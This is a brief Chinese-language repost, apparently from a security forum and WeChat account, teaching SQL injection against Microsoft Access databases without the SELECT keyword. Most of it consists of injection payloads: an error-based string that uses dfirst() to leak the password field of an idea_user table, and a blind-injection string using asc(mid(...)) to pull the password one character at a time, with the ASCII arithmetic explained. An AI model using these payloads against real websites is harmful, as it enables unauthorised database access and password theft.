From:https://forum.90sec.org/forum.php?mod=viewthread&tid=10663
需要报错
select * from idea_user where id=3+(dfirst([password],([idea_user]!
)))
盲注
select * from idea_user where id=3+asc(mid((dfirst("
","[idea_user]")),1,1))-101password字段第一个字符为e,对应ascii为101,所以id=3+101-101 还是等于3,页面返回正常
本文始发于微信公众号(关注安全技术):ACCESS无select SQL注射
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论